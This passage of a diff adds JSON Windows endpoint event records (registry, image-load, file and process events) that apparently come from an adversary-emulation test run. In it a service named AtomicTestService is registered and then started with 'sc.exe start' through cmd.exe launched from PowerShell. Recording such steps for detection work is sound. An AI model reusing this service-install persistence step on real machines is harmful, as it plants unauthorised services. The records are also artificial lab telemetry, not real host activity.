"ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1480, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570844650000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 8148, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 8148, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 8148, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 8148, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 8148, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 8148, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_value": "AtomicTestService", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Type", + "registry_value": "Type", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start", + "registry_value": "Start", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ErrorControl", + "registry_value": "ErrorControl", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ImagePath", + "registry_value": "ImagePath", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ObjectName", + "registry_value": "ObjectName", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "process", + "pid": 8148, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "subtype": "terminate", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" + }, + { + "event_type": "image_load", + "image_name": "sc.exe", + "image_path": "C:\\Windows\\System32\\sc.exe", + "pid": 8148, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "timestamp": 131883570844810016, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}" + }, + { + "event_type": "file", + "file_name": "SC.EXE-BC6DAF49.pf", + "file_path": "C:\\Windows\\Prefetch\\SC.EXE-BC6DAF49.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "process", + "pid": 1480, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}" + }, + { + "event_type": "file", + "file_name": "CMD.EXE-89305D47.pf", + "file_path": "C:\\Windows\\Prefetch\\CMD.EXE-89305D47.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883570844960000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"sc.exe start AtomicTestService\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 5588, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570845090000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010FCC54C01}", + "unique_ppid": 